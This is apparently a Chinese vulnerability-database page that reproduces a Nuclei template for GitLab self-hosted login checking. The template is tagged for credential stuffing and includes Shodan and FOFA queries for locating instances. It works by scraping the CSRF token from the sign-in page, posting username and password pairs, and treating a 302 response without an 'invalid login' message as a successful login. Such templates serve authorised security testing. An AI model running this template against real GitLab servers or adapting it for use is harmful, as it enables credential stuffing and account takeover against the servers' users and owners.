gitlab-login-check-self-hosted: Gitlab Login Check Self Hosted

日期: 2025-08-01 | 影响软件: gitlab login check self hosted | POC: 已公开

漏洞描述

Checks for a valid login on self hosted GitLab instance.

PoC代码[已公开]

id: gitlab-login-check-self-hosted

info:
  name: Gitlab Login Check Self Hosted
  author: parthmalhotra,pdresearch
  severity: critical
  description: Checks for a valid login on self hosted GitLab instance.
  reference:
    - https://owasp.org/www-community/attacks/Credential_stuffing
  metadata:
    max-request: 2
    shodan-query: product:"GitLab Self-Managed"
    fofa-query: product="GitLab"
  tags: creds-stuffing,login-check,self-hosted,gitlab,vuln
variables:
  username: "{{username}}"
  password: "{{password}}"

http:
  - raw:
      - |
        GET /users/sign_in HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /users/sign_in HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Origin: {{BaseURL}}
        DNT: 1
        Content-Type: application/x-www-form-urlencoded
        Referer: {{BaseURL}}/users/sign_in
        Accept-Language: en-US,en;q=0.9,de;q=0.8

        authenticity_token={{url_encode(authenticity_token)}}&user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&user%5Bremember_me%5D=0

    attack: pitchfork

    extractors:
      - type: regex
        part: body
        internal: true
        name: authenticity_token
        group: 1
        regex:
          - '"/users/sign_in".*?authenticity_token"\s+value="([^"]+)"'

      - type: dsl
        dsl:
          - username
          - password
    matchers:
      - type: dsl
        dsl:
          - status_code_2 == 302
          - '!contains(to_lower(body_2), "invalid login")'
        condition: and
# digest: 490a004630440220017ed9316f88a6e507682d3e753f559c54aca3fa68638fc07fb442b6b6ceb8cd02205b657bc5cca482a2870002c8439761c7bd001b0424f93c653312264f8e4860ef:922c64590222798bb761d5b6d8e72950

相关漏洞推荐